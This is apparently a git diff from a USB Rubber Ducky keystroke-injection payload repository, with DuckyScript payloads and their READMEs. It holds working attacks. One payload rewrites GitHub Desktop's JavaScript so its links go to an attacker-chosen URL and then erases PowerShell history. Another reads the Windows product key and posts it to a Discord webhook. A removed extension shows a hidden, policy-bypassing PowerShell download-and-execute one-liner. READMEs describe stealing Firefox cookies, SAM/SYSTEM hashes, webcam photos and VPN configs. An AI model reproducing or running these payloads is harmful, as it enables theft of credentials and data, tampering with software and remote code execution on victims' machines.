# Version : 1.0 #
# Category : Execution #
# Target : Windows 10/11 #
# #
#####################################################
END_REM
REM REQUIRED - Define here the new url that will replace the original github link
DEFINE #NEW_LINK example.com
REM DON'T CHANGE - This variable is a constant in this case, change it only if you are sure that the path to GithubDesktop is not the default
DEFINE #SUBDIRECTORY \AppData\Local\GitHubDesktop
REM_BLOCK
Credits: Hak5 LLC
Website: https://hak5.org/
Source: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt
END_REM
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r
DELAY 1000
STRINGLN PowerShell
DELAY 1000
STRINGLN_POWERSHELL
$path = Join-Path -Path $env:USERPROFILE -ChildPath "#SUBDIRECTORY"
$folders = Get-ChildItem -Path $path -Directory | Where-Object { $_.Name -like "app-*" }
$versions = $folders | ForEach-Object {
[PSCustomObject]@{
FolderName = $_.Name
Version = [version]($_.Name -replace "app-", "")
}
}
$latestVersionFolder = $versions | Sort-Object Version -Descending | Select-Object -First 1
$latestFolderPath = Join-Path -Path $path -ChildPath $latestVersionFolder.FolderName
$latestFolderPath += "\resources\app\"
$renderer = "renderer.js"
$main = "main.js"
$filePath = "$latestFolderPath$renderer"
$fileContent = Get-Content $filePath
$regex = [regex]'(https:\/\/(?![\w\d\.\/\-]*api)[\w\d\.\/\-]*github[\w\d\.\/\-]+)'
$modifiedContent = $fileContent -replace $regex, '#NEW_LINK'
Set-Content -Path $filePath -Value $modifiedContent
$filePath = "$latestFolderPath$main"
$fileContent = Get-Content $filePath
$regex = [regex]'openExternal\("(https:\/\/[\w\d\.\/\-]*github[\w\d\.\/\-]+)"\)'
$modifiedContent = $fileContent -replace $regex, ('openExternal("#NEW_LINK")')
Set-Content -Path $filePath -Value $modifiedContent; Remove-Item (Get-PSReadlineOption).HistorySavePath; exit
END_STRINGLN

View File

@ -45,4 +45,26 @@ DELAY 4000
- Receiver email address - Receiver email address
- Email Subject - Email Subject
- Email Message - Email Message
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -18,10 +18,28 @@ Opens a shell, download the vpn file, set the vpn through openvpn, erase traces.
* Internet Connection * Internet Connection
* 'openvpn' installed * 'openvpn' installed
### Executing program
* Plug in your device
### Settings ### Settings
* Set the VPN file link * Set the VPN file link
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -2,7 +2,7 @@
This script can be used to change the default DNS server in Windows 11. This script can be used to change the default DNS server in Windows 11.
**Category**: Execute **Category**: Execution
## Description ## Description
@ -15,4 +15,26 @@ The script open the settings, then go to network settings, then go to wi-fi sett
```DuckyScript ```DuckyScript
REM DNS IPv4 like Cloudflare DNS 1.1.1.1 REM DNS IPv4 like Cloudflare DNS 1.1.1.1
DEFINE DNS example DEFINE DNS example
``` ```
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -3,7 +3,7 @@ REM # |
REM # Title : Set An Arbitrary DNS (IPv4 version) | REM # Title : Set An Arbitrary DNS (IPv4 version) |
REM # Author : Aleff | REM # Author : Aleff |
REM # Version : 1.0 | REM # Version : 1.0 |
REM # Category : Execute | REM # Category : Execution |
REM # Target : Windows 11 | REM # Target : Windows 11 |
REM # | REM # |
REM ######################################################## REM ########################################################

View File

@ -2,7 +2,7 @@
This script can be considered by people who are new to the world of scripts written in DuckyScript so that they can understand how to start a PowerShell with administrator permissions on a Windows machine. This script can be considered by people who are new to the world of scripts written in DuckyScript so that they can understand how to start a PowerShell with administrator permissions on a Windows machine.
**Category**: Execute **Category**: Execution
## Description ## Description
@ -27,4 +27,26 @@ It is important to note that running PowerShell with administrator privileges in
![](docs/2.png) ![](docs/2.png)
- `STRINGLN Get-ExecutionPolicy -List` - `STRINGLN Get-ExecutionPolicy -List`
![](docs/3.png) ![](docs/3.png)
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -3,7 +3,7 @@ REM #
REM # Title : Starting a PowerShell with administrator permissions in Windows | REM # Title : Starting a PowerShell with administrator permissions in Windows |
REM # Author : Aleff | REM # Author : Aleff |
REM # Version : 1.0 | REM # Version : 1.0 |
REM # Category : Execute | REM # Category : Execution |
REM # Target : Windows 10-11 | REM # Target : Windows 10-11 |
REM # | REM # |
REM #################################################################################### REM ####################################################################################

View File

@ -19,3 +19,25 @@ This script open the Task Manager app, then go to search bar, then write the pro
- Write the name of the process that you want to stop - Write the name of the process that you want to stop
`DEFINE PROCESS_NAME example` `DEFINE PROCESS_NAME example`
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -18,3 +18,25 @@ Open a PowerShell, stop the Signal proccess if it runs and then execute the unin
## Settings ## Settings
- Nothing to set, this payload is Plug-And-Play <3 - Nothing to set, this payload is Plug-And-Play <3
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -1,25 +1,69 @@
REM ############################################################### REM_BLOCK
REM # | ###############################################################
REM # Title : Create And Exfiltrate A Webhook Of Discord | # #
REM # Author : Aleff | # Title : Create And Exfiltrate A Webhook Of Discord #
REM # Version : 1.0 | # Author : Aleff #
REM # Category : Exfiltration | # Version : 1.0 #
REM # Target : Windows 10-11 | # Category : Exfiltration #
REM # | # Target : Windows 10-11 #
REM ############################################################### # #
###############################################################
END_REM
REM Requirements: REM Requirements:
REM - Internet connection REM - Internet connection
REM - Discord Installed REM - Discord Installed
REM You must define the Discord server name i.e. Hak5 REM You must define the Discord server name i.e. Hak5
DEFINE #SERVER_NAME example DEFINE #SERVER_NAME example
REM You must define your Discord webhook if you want to use this method for the exfiltration REM You must define your Discord webhook if you want to use this method for the exfiltration
DEFINE #DISCORD_WEBHOOK example DEFINE #DISCORD_WEBHOOK example
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
REM Open Discord app REM Open Discord app
GUI GUI
DELAY 1000 DELAY 1000
@ -74,11 +118,11 @@ TAB
DELAY 500 DELAY 500
TAB TAB
DELAY 500 DELAY 500
DOWN_ARROW DOWNARROW
DELAY 500 DELAY 500
DOWN_ARROW DOWNARROW
DELAY 500 DELAY 500
DOWN_ARROW DOWNARROW
DELAY 500 DELAY 500
ENTER ENTER
DELAY 500 DELAY 500

View File

@ -27,3 +27,25 @@ Open a PowerShell, download the Python script and execute it. The Python script
- Setup your Python script link in the payload.txt file - Setup your Python script link in the payload.txt file
- Setup your Discord webhook link in the script.py file - Setup your Discord webhook link in the script.py file
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -30,3 +30,25 @@ Opens a shel, zip all zippable (R permission) content of the folder, send the zi
* Set your dropbox access token * Set your dropbox access token
* Set the folder path interessed (i.e. /Documents) * Set the folder path interessed (i.e. /Documents)
* Change (if you think that it is necessary) the delay of the zipping operation * Change (if you think that it is necessary) the delay of the zipping operation
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -31,3 +31,25 @@ Opens a shel, zip all zippable (R permission) content of the log folder, send th
* Set your dropbox access token * Set your dropbox access token
* Change if needed the folder path interessed (i.e. /var/log) * Change if needed the folder path interessed (i.e. /var/log)
* Change (if you think that it is necessary) the delay of the zipping operation * Change (if you think that it is necessary) the delay of the zipping operation
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -18,10 +18,28 @@ Opens a shell, get the network card name, get the network configuration using nm
* Internet Connection * Internet Connection
* Dropbox Token * Dropbox Token
### Executing program
* Plug in your device
### Settings ### Settings
* Set the Dropbox token * Set the Dropbox token
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -17,11 +17,29 @@ Opens a shell, get the network card name, get the network traffic using tcpdump,
* Permissions * Permissions
* Internet Connection * Internet Connection
### Executing program
* Plug in your device
### Settings ### Settings
* Set the Dropbox token * Set the Dropbox token
* Set the sniffing filter * Set the sniffing filter
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -18,10 +18,6 @@ A script used to exfiltrate photos using fswebcam shell command. The permissions
* sudo permission * sudo permission
* 'fswebcam' installed but you can install it with the payload * 'fswebcam' installed but you can install it with the payload
### Executing program
* Plug in your device
### Settings ### Settings
* Dropbox Token - You should change it into the script.sh file, line 7. * Dropbox Token - You should change it into the script.sh file, line 7.
@ -54,3 +50,25 @@ REM DELAY 5000
REM DELAY Based On Internet Power REM DELAY Based On Internet Power
DELAY 4000 DELAY 4000
``` ```
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -18,10 +18,28 @@ Opens a shell, get the process info, set the Discord webhook configuration, send
* Internet Connection * Internet Connection
* Discord Webhook * Discord Webhook
### Executing program
* Plug in your device
### Settings ### Settings
* Set the Discord Webhook configuration * Set the Discord Webhook configuration
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -27,10 +27,28 @@ Finally, the Invoke-RestMethod cmdlet of PowerShell is used to send an HTTP POST
* An internet connection * An internet connection
* Windows 10,11 * Windows 10,11
### Executing program
* Plug in your device
### Settings ### Settings
* Dropbox Webhook * Dropbox Webhook
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -0,0 +1,95 @@
# Exfiltrate Windows Product Key
Through this payload, you can export the key information related to the Windows Product Key, knowing its type and the key itself, using a Discord Webhook.
No administrator permissions are required to do this, isn't that absurd, right? :-)
![](./assets/1.png)
**Category**: Exfiltration
## Index
- [Introduction](#exfiltrate-windows-product-key)
- [Note](#note)
- [Dependencies](#dependencies)
- [Settings](#settings)
- [Payload Description](#payload-description)
- [Product Key Types](#product-key-types)
- [Sources](#sources)
## Note
Tested on:
- Windows 11
## Dependencies
- Discord Webhook
## Settings
This portion of the payload serves as a user-defined configuration section where you should input your Discord Webhook URL. You should replace "example.com" with the actual Discord Webhook URL you want to use. The Webhook URL is the endpoint where your payload will send the acquired information related to the Windows Product Key, as well as its type, for exfiltration to a specified Discord channel or server. It's a crucial part of the payload that connects the data extraction process to your Discord platform for further analysis or actions.
```DuckyScript
DEFINE #DISCORD_WEBHOOK example.com
```
## Payload Description
Through this payload, you can export essential information related to the Windows Product Key using a Discord Webhook, ensuring that you identify its type and the key itself.
At the beginning of the payload, the DETECT_READY extension [[1](#sources)] is used to optimize the opening of a PowerShell session on the target.
The following commands are then executed to obtain the necessary information about the Product Key:
1. This command retrieves the currently in-use Product Key:
```powershell
wmic path softwarelicensingservice get OA3xOriginalProductKey
```
2. This command helps determine the type of key. You can refer to the [key types section](#key-types) for more details:
```powershell
wmic path softwarelicensingservice get OA3xOriginalProductKeyDescription
```
The acquired information is stored in the `$exfiltration` variable, which is subsequently used to create the `$payload` object. This object is then utilized for exfiltration via a Discord Webhook.
**Exfiltration via Discord Webhook**:
The `$hookUrl` variable was initialized at the beginning of the payload with the value you need to define before execution.
```powershell
Invoke-RestMethod -Uri $hookUrl -Method Post -Body ($payload | ConvertTo-Json) -ContentType 'Application/Json'; exit
```
**Exfiltration via USB Rubber Ducky Storage**:
If you use the exfiltration method set up to retain data using Rubber Ducky's USB storage, you will not have to make any changes.
## Product Key Types
When dealing with Windows Product Keys, it's essential to understand the different types and their characteristics:
- **OEM Keys** (*Original Equipment Manufacturer*):
**Transferability**: Not supposed to be transferable. These keys are typically tied to the prebuilt PC on which they were originally installed.
**Usage**: Manufacturers use OEM keys to install Windows on new computers.
**Procurement**: OEM keys can sometimes be found at discount key vendors, although their use on different hardware may be challenging.
- **Retail Keys** (*aka "Full Packaged Product" Keys*):
**Transferability**: Transferrable. These keys can be moved from one computer to another.
**Cost**: Retail keys are often more expensive, often exceeding $100.
**Hidden Keys**: In some cases, a computer may already have a retail key, perhaps from a previous Windows upgrade. Users might not be aware of this until they check.
Understanding these key types is crucial when working with Windows Product Keys, as it can impact their use, transferability, and compatibility with different hardware and scenarios.
*Note: Source of this info [[2](#sources)]*
## Sources
- [1] Detect Ready: https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
- [2] Is your Windows Product Key transferrable? https://www.tomshardware.com/how-to/transfer-windows-license-to-new-pc#is-your-windows-product-key-transferrable-3

Binary file not shown.

After

Width:  |  Height:  |  Size: 25 KiB

View File

@ -0,0 +1,82 @@
REM_BLOCK
###################################################
# |
# Title : Exfiltrate Windows Product Key |
# Author : Aleff |
# Version : 1.0 |
# Category : Exfiltration |
# Target : Windows 10-11 |
# |
###################################################
END_REM
REM Put here your Discord Webhook, i.e. https://discord.com/api/webhooks/0123456789.../abcefg...
DEFINE #DISCORD_WEBHOOK example.com
REM_BLOCK
How would you prefer to do the exfiltration?
Via Discord Webhooks or via Rubber Ducky USB storage?
If you prefer to use the storage offered by USB Rubber Ducky, set the boolean variable #USB_RUBBER_DUCKY_STORAGE to TRUE, otherwise set it to FALSE and the alternative mode will be automatically selected, so via Discord Webhook.
END_REM
DEFINE #USB_RUBBER_DUCKY_STORAGE TRUE
REM_BLOCK
This definition allows the drive label to be parameterized dynamically.
Instead of hardcoding the "DUCKY" label throughout the script, we use a defined variable at the beginning that can be easily adjusted.
This way, if the drive label changes or needs to be customized for different environments, you only need to update this definition without altering multiple instances in the code. Its an approach that enhances the script's flexibility and maintainability.
END_REM
DEFINE #DUCKY_DRIVE_LABEL DUCKY
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
GUI r
DELAY 1000
STRINGLN powershell
DELAY 2000
STRINGLN $key_detected=$(wmic path softwarelicensingservice get OA3xOriginalProductKey)+$(wmic path softwarelicensingservice get OA3xOriginalProductKeyDescription);
IF_DEFINED_TRUE #USB_RUBBER_DUCKY_STORAGE
STRINGLN
$m=(Get-Volume -FileSystemLabel '#DUCKY_DRIVE_LABEL').DriveLetter;
echo $key_detected >> ${m}:\exfiltration.txt
END_STRINGLN
END_IF_DEFINED
IF_NOT_DEFINED_TRUE #USB_RUBBER_DUCKY_STORAGE
STRINGLN
$hookUrl = "#DISCORD_WEBHOOK"
$exfiltration = @"$key_detected"@
$payload = [PSCustomObject]@{
content = $exfiltration
}
Invoke-RestMethod -Uri $hookUrl -Method Post -Body ($payload | ConvertTo-Json) -ContentType 'Application/Json'; exit
END_STRINGLN
END_IF_DEFINED

View File

@ -18,4 +18,26 @@ Open a PowerShell, select dynamically the Firefox path adding "cookies.sqlite" a
- You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token. - You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token.
`DEFINE DROPBOX_ACCESS_TOKEN "example"` `DEFINE DROPBOX_ACCESS_TOKEN "example"`
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -45,4 +45,26 @@ This script open the Firefox app, then go to downloads page and copy all, then o
Invoke-RestMethod -Uri $WebhookUrl -Method Post -Body $Payload -ContentType 'application/json' Invoke-RestMethod -Uri $WebhookUrl -Method Post -Body $Payload -ContentType 'application/json'
} }
``` ```
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -35,3 +35,24 @@ Then it cleans up traces of what you have done after.
* Invoke Get-Content for get in plaintext the ProtonVPN .config content * Invoke Get-Content for get in plaintext the ProtonVPN .config content
* Invoke-WebRequest will be entered in the Run Box to send the content * Invoke-WebRequest will be entered in the Run Box to send the content
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -8,7 +8,7 @@
<img alt="TARGET: WINDOWS 10, 11" src="https://img.shields.io/badge/TARGET-WINDOWS_10,_11-blue?style=for-the-badge"> <img alt="TARGET: WINDOWS 10, 11" src="https://img.shields.io/badge/TARGET-WINDOWS_10,_11-blue?style=for-the-badge">
</a> </a>
<a href="#"> <a href="#">
<img alt="VERSION: 1.1" src="https://img.shields.io/badge/VERSION-1.1-green?style=for-the-badge"> <img alt="VERSION: 1.2" src="https://img.shields.io/badge/VERSION-1.2-green?style=for-the-badge">
</a> </a>
</p> </p>

View File

@ -3,7 +3,7 @@ REM_BLOCK DOCUMENTATION
Author: PlumpyTurkey Author: PlumpyTurkey
Description: This payload sends you the target PC's Windows product key via Dropbox. Description: This payload sends you the target PC's Windows product key via Dropbox.
Target: Windows 10, 11 Target: Windows 10, 11
Version: 1.1 Version: 1.2
Category: Exfiltration Category: Exfiltration
END_REM END_REM
@ -108,39 +108,4 @@ EXTENSION WINDOWS_ONLY
END_IF END_IF
END_EXTENSION END_EXTENSION
EXTENSION RUN_HOSTED_POWERSHELL
REM_BLOCK DOCUMENTATION
Title: Run Hosted PowerShell
Author: PlumpyTurkey
Description: This extension executes a hosted PowerShell script using the Windows Run dialog box.
Target: Windows 10, 11
Version: 1.0
END_REM
REM Required options:
DEFINE #RHP_SCRIPT_URL example.com
REM Advanced options:
DEFINE #RHP_DELAY 2000
DEFINE #RHP_ELEVATED_EXECUTION FALSE
DEFINE #RHP_DISABLE_AFTER_EXECUTION FALSE
GUI r
DELAY #RHP_DELAY
STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX"
IF_DEFINED_TRUE #RHP_ELEVATED_EXECUTION
CTRL SHIFT ENTER
DELAY #RHP_DELAY
LEFT
END_IF_DEFINED
ENTER
IF_DEFINED_TRUE #RHP_DISABLE_AFTER_EXECUTION
ATTACKMODE OFF
END_IF_DEFINED
END_EXTENSION
RHP_RUN() RHP_RUN()

View File

@ -38,4 +38,24 @@ Functions available:
- proto **$p "\<protocol>"** - proto **$p "\<protocol>"**
- *In this option you must put the protocol that you want to monitor, for example $proto="TCP" if you want to monitor TCP, else leave blank, so $proto="".* - *In this option you must put the protocol that you want to monitor, for example $proto="TCP" if you want to monitor TCP, else leave blank, so $proto="".*
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -0,0 +1,28 @@
# Exfiltrate NTLM Hash - Windows ✅
A script used to exfiltrate the NTLM hash on a Windows machine.
## Description
A script used to capture and exfiltrate the NTLM hash of a Windows machine. It utilizes PowerShell to retrieve the SAM and SYSTEM files, then sends them to a Discord webhook. These files can than be used to extract the NTLM hash of all users.
### Settings
* Set the Discord webhook URL
* Ensure the webhook permissions are configured
## Credits
<h2 align="center"> Luu176 </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/luu176">
<img src="https://avatars.githubusercontent.com/u/112649910?v=4?raw=true" width="48" height="48" />
</a>
<br>Github
</td>
</tr>
</table>
</div>

View File

@ -0,0 +1,34 @@
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
